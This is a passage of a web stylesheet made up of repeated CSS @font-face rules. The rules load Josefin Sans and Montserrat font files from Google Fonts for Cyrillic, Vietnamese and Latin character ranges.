U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4RHw.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4RHw.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7mw9c.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7mw9c.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7mw9c.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7mw9c.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: 